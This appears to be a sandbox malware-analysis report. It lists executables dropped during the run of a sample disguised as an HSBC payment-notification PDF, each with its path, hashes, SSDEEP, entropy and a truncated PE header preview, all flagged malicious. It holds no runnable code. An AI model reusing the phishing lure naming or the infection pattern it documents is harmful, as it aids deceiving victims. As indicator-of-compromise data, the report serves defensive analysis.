                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................IQ..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1298432
                                                                                                                                                                              Entropy (8bit):4.528979673098073
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:YFQAiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:CF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:A8138CA1CBD04B910311ED692B1DFD31
                                                                                                                                                                              SHA1:4D6CAFB7B60B5211015BCE4E238A23A2C42C3458
                                                                                                                                                                              SHA-256:B208CC9A7BC79E572E60E25FD0E3962B5C8DAF5EF6C90B32F632E7C6D07DDCF1
                                                                                                                                                                              SHA-512:E1EC0AA1FAA1F9E0E5C93BCE29C808685E81DE305AE4E34B352A86EF2AD0A004575C9CCE405D7449501B02AF61B4501936780B9682018778848A193BAED4E45A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................d........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1454592
                                                                                                                                                                              Entropy (8bit):4.787858363291528
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:5i7le3roAU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AloroAULNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2D4BA2AF0879BE0FCA1826705F2AFF4F
                                                                                                                                                                              SHA1:F62B964A6669667B8A730ECC21DF9482D69617F7
                                                                                                                                                                              SHA-256:C67A49C6F8E334DD589BE13F26E87F844BAA8F56B5F076B16EE6DCFC09F90CDC
                                                                                                                                                                              SHA-512:DC97EFB73B458456A48FA2771625379F15497D0E8B09C8ED06D9373CC3712BC7BB4FD71A042C76553D40F20547497C437420298CB477212336B227E6F3BEF726
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.....N...................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1424896
                                                                                                                                                                              Entropy (8bit):4.811518200640379
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:1NfQNI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:/GILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3A9D548EE40CA49EF92046275CD4C991
                                                                                                                                                                              SHA1:343C056A655493A308CE805F803571A9C59D62B8
                                                                                                                                                                              SHA-256:149B6DDF22FEF876D0616F327C16FCF196D75E4EFA203CEC867820D6AF3C1FE8
                                                                                                                                                                              SHA-512:9BB84E2534039A127A2B2F2BA62434E1F51795E8C237F123028904F00CD63119E5902D6024B02FFA1CAEF65CA34BD16732BC9989FD0E98722B2C6B41C323028A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... .............................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1443328
                                                                                                                                                                              Entropy (8bit):4.83241372960241
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:KLib/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:51CC955DBD8A82C14FDE76DC60E8B59D
                                                                                                                                                                              SHA1:A86C53F083C1A7F60F91235426F8D11B1565F8DF
                                                                                                                                                                              SHA-256:2D4550F9A1DF26A111CE1D4C0EB714BB8379BAF0B2C6175AA62E6F70DB31D5BA
                                                                                                                                                                              SHA-512:573146783F92BFF0F106E23732B11092312AEC0283F4E69619D698146FC2F99EF6C8256C10A5BB471957DF013427A5E34F7F6726C08046186287F958728E63C9
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1443328
                                                                                                                                                                              Entropy (8bit):4.832412373043977
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:fLib/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ELNiXicJFFRGNzj3
                                                                                                                                                                              MD5:C3950F6C939BBE3A7DEFBCA8CCD439D2
                                                                                                                                                                              SHA1:19D53ED3A15721194ED41BB9232C5D2189554B3F
                                                                                                                                                                              SHA-256:0B7FCEC112BCDC6C22AD39529FADC931316395ABCB35DBB9E15368F177B31077
                                                                                                                                                                              SHA-512:E0B4C008BA1AB09A6DB59BA82E8253C3EA134234B76A9D9B42FBE687ADDF5CB98A223582D44E4B3BE90451B67D18B24C039610D440BEA71AE886FB51156A6F27
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... ..... ............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1499136
                                                                                                                                                                              Entropy (8bit):4.787958024517551
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Ffn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FfnLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:04AD7F5BB0A9D4D8841DDF55766C968D
                                                                                                                                                                              SHA1:81D494ED6A2EE8EE27310078EF1E02A79857D7CC
                                                                                                                                                                              SHA-256:CE201B6CFC4362C37926526A4B14CB81589A8146B088F02B7D14FC3A70A3F456
                                                                                                                                                                              SHA-512:3561DCFC1323E6B3091D0368C39B9D90F6499C294A45D87B715E718ACB8E22443F727EA7178C597A1176E317FA32B4B38BEFA8A64939B28872382B1CD5A5448A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!........... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1651712
                                                                                                                                                                              Entropy (8bit):5.15348767702533
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FbUO42K/Ex/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FRxLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:7FCECA32F245BC33B23FA0A90F141A01
                                                                                                                                                                              SHA1:557CBD9DDD1B247A300C1EC49472C704F935C98C
                                                                                                                                                                              SHA-256:01D9A7123260E129F462F9450C2D52675826D570205E779E73A6FBE197449016
                                                                                                                                                                              SHA-512:5F7A7EB2602365249BE683520661FC0EC1116E68BCC3BB0D157376EFF9B39F8E23BB8FDA3BCFB02DC00C4E2C12578154E34D2D25D52D40A70358B51697393E01
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@..........................0$.....@............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...............d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52712960
                                                                                                                                                                              Entropy (8bit):7.961745067083342
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1572864:6KjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:NicZmsR3Lo/cnLe
                                                                                                                                                                              MD5:A672AD10F358F8E7BD2213C61C0683C7
                                                                                                                                                                              SHA1:EBE097D333BCD6302D76EB8ACCBC2CB4F3E68BB9
                                                                                                                                                                              SHA-256:09BB34812220F30A20298EBB192ABBE3AB05D00E7D248CB894C93A24291E8B78
                                                                                                                                                                              SHA-512:24C33FBD7276E2C31A926B5FDA4DA21731F18CF739041316477747AD0EF26F21FF56669BE16AB0D0721BEE67FF114D4ECE004C08A783B8DAF24987FEB13E34FA
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.......$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1812992
                                                                                                                                                                              Entropy (8bit):5.2500115165861985
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:Jd8DMeflpnIOvYU4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JCDD9pnIOqLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5213131E8048BAB1099B7570DF3AB023
                                                                                                                                                                              SHA1:312BF81E1D21A80A1E97B7434D41B6D561A13EED
                                                                                                                                                                              SHA-256:1F5F17D56D00B8303C8ED1E0AB96B41030D936A17485641208D7C33120FA1AE7
                                                                                                                                                                              SHA-512:1D393EDBCEEC4F2B59F952F4BF4E6F1E4F550D754B7A0A9AF96AAD2D03D5ECC347A0B20BA9D4ABA0372AE82A8BDFB6B4F3946D5680557C90D78BA01D2696710F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'.....^..... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4364800
                                                                                                                                                                              Entropy (8bit):6.745649234967871
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:PB1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8ERLNiXicJFFRGN:jHzorVmr2gkRpdJYoln7wRGpj3
                                                                                                                                                                              MD5:032EA851990553681FB46AB5FA8FCF14
                                                                                                                                                                              SHA1:51D35588E2309C53C5BDC15C7683238A9A92EE25
                                                                                                                                                                              SHA-256:89F74977DE3E2ABC6DCF0FBBDABE36269F9CC6364216B25593D799A4949981D2
                                                                                                                                                                              SHA-512:1FB43FE20C61835C852594A00D73144CECB75630F9DA275DFBD243DE7B9FE9E6F6080FBAECF19A50F007A5B3FABC1E76D38E4823540177AEA2C408326E3BFB3A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1394176
                                                                                                                                                                              Entropy (8bit):4.671303731095913
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:qEyT6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xymLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:706EB52E44588A85A3CB806033C96603
                                                                                                                                                                              SHA1:BCB045B7A0F494E6610152249E4FAD721E96908A
                                                                                                                                                                              SHA-256:FCF72CEEC46C939DEA1B159E7CD84D486C605D2AE3DD7C48088958CD1CBF7AFC
                                                                                                                                                                              SHA-512:A0E3FD4A0850A42FE7642A5D0F403BC251E12ED040D082276155EE85A6319E1093EE9A5EEEA395E68A4F6E28270A12B2B7AE06D762DEE9CB2DB5A670F09094BD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` .....]..... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2354176
Entropy (8bit): 7.045012760202469
Encrypted: false
SSDEEP: 49152:lhDdVrQ95RW0YQHyWQXE/09Val0GMLNiXicJFFRGNzj3:lhHYWmHyWKz7wRGpj3
MD5: AB3EAE016DCC7F0026DB2D4EF2BCCB01
SHA1: 03BB4C262E82C6269F0CEAF20FF77E1090936E2F
SHA-256: E67AB7CE13ED7B32DE499B6AD3D8E61F774CF5101D8F4BF10FF93CB1189257EA
SHA-512: ED573C52C85F4AFD8CC32A71530CCA49829CCA657D3F9A8B0CDEEAD56C970CF4F5D841524DB43AF7BECF3A16E00D2D371FC40459A6B2709E91F0ABE762E2BB25
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1825280
Entropy (8bit): 7.152085736501312
Encrypted: false
SSDEEP: 24576:a70E0ZCQZMib6Rrt9RoctGfmddB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:e0EzQS7RPRoc1VLNiXicJFFRGNzj3
MD5: D164B86D85E4FA61FD437AC49651FD45
SHA1: A5E9885BE9AE0A5392FFE9A79527343B22F70C2C
SHA-256: 2A6520929D8C5C6ABC5CB9A0B01DC9479FD14F490C3728FD65F40040225D7378
SHA-512: FE794DF290FC3F0DAACF3A96E2C130DAA501D87601CA0832D46222B753828649B0CCB3C3FEB2A7D55B63318CFF39D9D1D9C0757191A50677F5657F0BFD8E5045
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.139168248169895
Encrypted: false
SSDEEP: 24576:yiD2VmA1YXiHwlklb8boUuWPg2gG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:hD2VmAygwIb8boQxLNiXicJFFRGNzj3
MD5: 71C98839DD7F0C3CD1F5393202F346CF
SHA1: 1F665BA446B1EC04C3786A6B89157280F98DC303
SHA-256: D6A3DECA4DE7F5C86DBDD361F7BCCA6D3C8247472C67ECD0D7118B0E1B255B85
SHA-512: 7E0A83DCC72E5F4CF2CA3996D8DF151DFD90E6CB7B5D5FA815C2C06C7F37C11357556523EC30B0AE6266CE12752F2440FFB5FC5EBB2600F365CD670F8001643B
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2853376
Entropy (8bit): 6.946956268922784
Encrypted: false
SSDEEP: 49152:TfD3zO9ZhBGlohzM3HRNr00pLNiXicJFFRGNzj3:bDaalSzM00p7wRGpj3
MD5: CA57BF46E41B70D65A4B54B512FBF39B
SHA1: 6B7898E54F8CC0AED4FEBB5C98EC1CB373AF2703
SHA-256: 54C5F738BA578FC2C844858D8FBDFC9676900FB95248A4FC8F9C947D21647E60
SHA-512: 387EAD02731A0E49B100B81969ECCF50CEFA74B02E891CC1E2C781D8E9345F8F5025215762D49B9023F30EF6C4201AF6AF4E74C9ABC603015F6BA283DD2E9B15
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4320256
Entropy (8bit): 6.821900455106531
Encrypted: false
SSDEEP: 49152:2TaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhSLNiXicJy:pI72Lvkr4pbxJRoIMB7wRGpj3
MD5: A0E20A93BF158E05662F34C2551E4763
SHA1: 2AD9770017D7ADF8C816F5E98FFDFFF2E82FD59A
SHA-256: 565BB6F9466B9DFDBC5381F67B05F7B6F6F138882A6928DF645E69A41127ACD8
SHA-512: 5B142A74DAD0A37BC50A64DEEC0D8A675FB1CC13363D550A15FC703B5937C173F7F9A45113BF88931BC88CE42787B178C359F542E9FC43A0BD89293A90FD6230
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2062336
Entropy (8bit): 7.091524759425025
Encrypted: false
SSDEEP: 24576:YW9Jml9mmijxiMnF+ZxmQWcbLw8VR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YWnm5iAMkjmQWkVRLNiXicJFFRGNzj3
MD5: 60263050E5D700898109EF995A52CE93
SHA1: 13BD17BE88DBED22AE831BBD41E2FD211C8BDB5C
SHA-256: 0B7DB0B039E687B756E630EF3575BDBC216AE2D07EDC099D8861DCB044FBD7D2
SHA-512: 9D12BE4ED967C7773EA6D3921F99CBD062F294EDD02B59D16BDFFA954B672F5C4B90C53DE295AECC7E7365EBACD21D19656F00683CC83A15578215B1BC43F39E
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1801216
Entropy (8bit): 7.159884222737881
Encrypted: false
SSDEEP: 24576:gwNHwoYhua6MZERO4qbBJTY6mY1uIgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gwNPdNO7BJTfmEALNiXicJFFRGNzj3
MD5: 351954F4963BECECE28930FCBD0CA02C
SHA1: BE2EABC642BC52FC46ABBE345CC5359DE0E8DE70
SHA-256: CE9BC8F37C93B702EE7C4CF258713FA966A9A0D10F3DD6B4264BE6DE4762A704
SHA-512: 1672476FF23C31E7972AAE91E67E7D9A7D057D51B373B45BF76EBD5F1650EFA110DFCC126EF631CD654B128EFE4795DA9E824225E4D654F9A9426678E678EBB9
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.139177585412219
Encrypted: false
SSDEEP: 24576:CiD2VmA1YXiHwlklb8boUuWPg2gG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xD2VmAygwIb8boQxLNiXicJFFRGNzj3
MD5: 12E1B8925E209DF0378A621F2CF30FFA
SHA1: 784ADCB8D6182118C7F469D524AF7B0254A5C7C9
SHA-256: 3679E95FB051CC75D715AEDD2966E24D22E6BC70B757953700E68351A4111ED5
SHA-512: 278F1B56668B234E380BC366F52D932679A023D743D45E630932BF4D8600FAC0A316F7B27B81ABD150389182F19E05691AFA09EDD656A8A3BE36F44F535CCC4F
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1801216
Entropy (8bit): 7.159885295427225
Encrypted: false
SSDEEP: 24576:kwNHwoYhua6MZERO4qbBJTY6mY1uIgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kwNPdNO7BJTfmEALNiXicJFFRGNzj3
MD5: C1B7D01BB02CA67F77E6850117EFAB09
SHA1: 988540A110083C33DD5279AFA03F1E0ED847332C
SHA-256: 0649F20304632DFA79786A3801833F31F03FBE00888B62A03609F713261F900B
SHA-512: 24532197C7FB7037FD0B518556D7F22D3C25F7B0977A0373F8AB617E7DF50679434A876850AD471E64704171AA94B8A34C1EDBCBF426051965E208ABC6FA0811
Malicious: true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1481216
Entropy (8bit):4.694141404006032
Encrypted:false
SSDEEP:24576:Q6lbht6BHs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7lNtqHsLNiXicJFFRGNzj3
MD5:38C9C3DED5D00754BD8B6E6E5B10B387
SHA1:440B8DD10C9D8D86976C01C7890A5F6925949EEE
SHA-256:4C7090739751E205F67873FD8F17DBA6131F3CACD33FCB63ED159234A17F2E6D
SHA-512:FEC35FA51D3232A918F7040F053827318CF6BBD0E6573B602660913CC88DAB047668514882CC40A2E42045AC40923AA600CF69B81EB0165C8E53E32CD022B85D
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1376768
Entropy (8bit):4.656856773394686
Encrypted:false
SSDEEP:24576:5IxkTBVA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Wxk1VALNiXicJFFRGNzj3
MD5:D7FED8AC02DF0307866F999C695E5655
SHA1:681DD52924ADE263A9490745C53C11FFA3EFEC9D
SHA-256:33912BDAD09643625D7DA704CF9FFD047734899A2188AF66A5B971A6D8CB1723
SHA-512:094FA02BE2B4C64003300F5DBFD0054A1AAEEE934152F4FCB4868614121DE910348CC957CEB6AA98BA5937D95C8BD3DB7B121C1197ADA171FAA2D91F77907E51
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1490944
Entropy (8bit):4.787382961566884
Encrypted:false
SSDEEP:24576:Xcssmrd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:MbuLNiXicJFFRGNzj3
MD5:0C2828866DFD7330E15AB1049881076D
SHA1:41691ED2773EDF49CC5572DD1C0B727DC8D4B5BF
SHA-256:8F16700BD406F98D94EDAEFC0B5DB84F20D099E38199892BA644945B0226D905
SHA-512:712B32C6DCBED55AC84B6000F0D05B4DA8B485B205E8E5F1BCB49838C79ACB476DC15B51D620450CBFF7D91A44C69662F869C29E98A125E25B7186C05CC48AD2
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1539584
Entropy (8bit):4.8965643001547
Encrypted:false
SSDEEP:24576:KTfcT++foSBWU2Yxhkgy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qfcK+foQWU2YnPyLNiXicJFFRGNzj3
MD5:5EFD3B9B3E1D483A0CE3855B570D4143
SHA1:1A4F3C02C6C6334AA81187FB204C04E83447F297
SHA-256:65C8BE0CA21A77699CF8291B1DC2D123D8113485F9D9E3C1D468BE01386264CD
SHA-512:2536F063CDD5987CF4BFF29175214012A91DCEB1DFEF54BE062A2C1B6AA987CE6BF7A466EB9D0CCB2623BB7D8F1746AA3B3D58D7DC1BA098E3A36D91E258CE83
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1376768
Entropy (8bit):4.656903388673929
Encrypted:false
SSDEEP:24576:hbBRzBgS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VBRVgSLNiXicJFFRGNzj3
MD5:2969B3A2AF3B2AFBC0617C3674BC8BDA
SHA1:45874B5B5D2D599187CCB9A725BA4B11B6E27A8F
SHA-256:135D1D3FC250D8C064567A5B33E98E5A8600D91D53B78636E152052ABFDBD2C5
SHA-512:00F48021EB5019E38066CF74224DBE7743D3BA6EB22EE4E7C5864FC94D16CB0AACFE0DCC71BF17CA0552653A1A8E8695711F9382AC3BCB30F347C5DB825DDAE4
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2168832
Entropy (8bit):7.93763841289764
Encrypted:false
SSDEEP:49152:qy53w24gQu3TPZ2psFkiSqwozYLNiXicJFFRGNzj3:qyFQgZqsFki+ozY7wRGpj3
MD5:6B49DE9E8F5864E490498A91204B87CE
SHA1:6E1595444FF0955C5D415CA0BAA511DB4D5D0D5D
SHA-256:E0089EAA039D645ADF62181437D9492D0BBAE6D70518736274A7EEBE6E40E9FD
